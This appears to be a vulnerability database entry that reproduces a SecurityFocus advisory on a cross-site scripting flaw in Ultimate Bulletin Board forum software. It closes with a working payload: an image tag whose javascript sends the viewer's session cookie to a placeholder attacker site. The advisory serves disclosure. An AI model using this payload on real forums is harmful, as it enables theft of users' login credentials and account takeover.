Ultimate Bulletin Board 5.4/6.0/6.2 Cross-Agent Scripting Vulnerability

2014-07-01T00:00:00
ID SSV:75045
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/3829/info

UBB (Ultimate Bulletin Board) is commercial web forums/community software that is written in Perl. It runs on various Unix/Linux variants, as well as Microsoft Windows NT/2000.

UBB is prone to cross-agent scripting attacks via the insertion of HTML tags into image links in messages. Due to insufficient input validation, it is possible to insert arbitrary script code in forum messages/replies. The malicious script code will be executed in the browser of the user viewing the message, in the context of the site running UBB.

This makes it possible for a malicious user to post a message which is capable of stealing another legitimate user's cookie-based authentication credentials. 

The following example will send cookie-based authentication credentials to the attacker's site:

[IMG]javascript:document.write
('<img%20src=http://attackersite/tools/cookie.plx?
cookie='+escape(document.cookie)+'>')
[/IMG]